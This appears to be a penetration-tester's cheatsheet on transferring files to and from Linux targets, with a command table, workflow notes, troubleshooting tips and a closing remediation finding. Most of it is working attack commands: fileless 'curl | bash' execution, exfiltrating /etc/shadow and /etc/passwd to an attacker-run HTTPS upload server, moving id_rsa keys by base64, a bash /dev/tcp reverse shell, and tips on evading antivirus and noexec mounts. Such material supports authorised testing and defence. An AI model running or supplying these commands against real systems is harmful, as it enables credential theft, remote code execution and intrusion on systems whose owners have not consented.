π‘οΈ Methodology Checklist
- wget:
wget http://[LHOST]:8080/[FILE] -O /tmp/[FILE] - curl:
curl http://[LHOST]:8080/[FILE] -o /tmp/[FILE] - SCP:
scp [USER]@[LHOST]:[FILE] /tmp/[FILE] - Netcat receive:
nc -lvp [PORT] > [FILE] - Netcat send:
nc [TARGET] [PORT] < [FILE] - Base64 transfer: encode β paste β decode on target
- Verify file size and hash after transfer
π― Operational Context
Use when: Moving files to/from Linux target β match method to available tools: wget, curl, SCP, nc, /dev/tcp, Python server.
Think Dumber First: wget http://[LHOST]/file -O /tmp/file β simplest. No wget? Try curl. No curl? /dev/tcp. No outbound? Try SCP pull from target to attack box. Always test with a small text file before transferring payloads.
Skip when: Strict egress filtering blocks all outbound β use local exploit or in-scope exfiltration channel.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
wget http://[TARGET_IP]/[FILENAME] -O /tmp/[FILENAME] | Download with wget to specific path |
curl -o /tmp/[FILENAME] http://[TARGET_IP]/[FILENAME] | Download with curl to specific path |
curl http://[TARGET_IP]/script.sh | bash | Fileless execution β pipe directly to bash |
wget -qO- http://[TARGET_IP]/script.py | python3 | Fileless execution via wget + python |
exec 3<>/dev/tcp/[TARGET_IP]/80; echo -e "GET /[FILE] HTTP/1.1\n\n" >&3; cat <&3 | Bash built-in /dev/tcp download (fallback when wget/curl missing) |
cat [FILENAME] | base64 -w 0; echo | Encode file to Base64 for copy-paste transfer |
echo -n '[BASE64]' | base64 -d > [FILENAME] | Decode Base64 to file |
md5sum [FILENAME] | Verify file integrity |
sudo systemctl enable ssh && sudo systemctl start ssh | Enable SSH server on attacker machine |
scp user@[TARGET_IP]:/root/file.txt . | Download (SCP pull) from remote to local |
scp /etc/passwd user@[TARGET_IP]:/home/user/ | Upload (SCP push) from local to remote |
sudo python3 -m pip install --user uploadserver | Install upload server module |
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' | Generate self-signed cert for HTTPS upload server |
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem | Start HTTPS upload server on port 443 |
curl -X POST https://[TARGET_IP]/upload -F 'files=@/etc/passwd' --insecure | Upload file to HTTPS upload server |
python3 -m http.server | Start simple HTTP server (victim as server, attacker pulls) |
php -S 0.0.0.0:8000 | PHP as HTTP server alternative |
ruby -run -ehttpd . -p8000 | Ruby as HTTP server alternative |
π¬ Deep Dive & Workflow
Transfer Method Priority (Linux)
- wget / curl β always try first; universally available
- SCP β best if SSH is available; encrypted and reliable
- Fileless pipe (
curl | bash) β no disk write, evades some AV - Python upload server β best for exfiltration (victim β attacker)
/dev/tcpβ critical fallback when all tools stripped
/dev/tcp β The Critical Fallback
Available in any Bash β₯ 2.04. Works even when wget, curl, nc, and scp are removed:
exec 3<>/dev/tcp/[TARGET_IP]/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3
cat <&3This opens a raw TCP socket on file descriptor 3, sends an HTTP GET, and reads the response.
Exfiltration: Victim as Server (Use with Caution)
Starting a server on the victim exposes an open port β inbound firewalls often block this:
# Python 3 (most common)
python3 -m http.server 8000
# Then on attacker: wget [VICTIM_IP]:8000/filePrefer the upload server method (POST to attacker) over this approach in enterprise environments.
HTTPS Upload (Encrypted Exfil)
Using HTTPS hides file content from network inspection tools:
# Attacker setup
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
# Victim command
curl -X POST https://[ATTACKER_IP]/upload -F 'files=@/etc/shadow' --insecureBase64 Transfer (No Network β Terminal Only)
Use when you have only copy-paste access and no direct network path:
# Source: encode
cat id_rsa | base64 -w 0; echo
# Destination: decode and verify
echo -n '[BASE64_STRING]' | base64 -d > id_rsa
md5sum id_rsa # must match source md5sumπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| wget not found | Minimal base OS | Try: curl, fetch (BSD), python3 urllib, /dev/tcp, tftp, scp |
| /tmp not writable | Permissions or noexec | Try: /dev/shm, /var/tmp, /run/user/[UID], /home/[USER]/.cache |
| nc not found or no -e flag | BSD nc or no nc | Use: bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1 for reverse shell; python for file transfer |
| SCP fails with βno matching cipherβ | OpenSSH version mismatch | Add: scp -o 'Ciphers aes128-cbc,aes192-cbc,aes256-cbc' ... for compatibility |
| File permissions wrong after transfer | umask on target | Chmod after transfer: chmod +x /tmp/payload or use install -m 755 src dst |
π Reporting Trigger
Finding Title: Unrestricted File Transfer to/from Linux System Impact: Multiple file transfer methods available (wget, curl, SCP, Python HTTP) enable reliable payload delivery and data exfiltration even when individual tools are unavailable. Root Cause: Standard Linux tooling provides numerous overlapping file transfer capabilities with no access control or monitoring. Recommendation: Apply SELinux/AppArmor profiles to restrict service account network access. Mount /tmp with noexec. Implement egress filtering for server workloads. Monitor for outbound connections from server processes.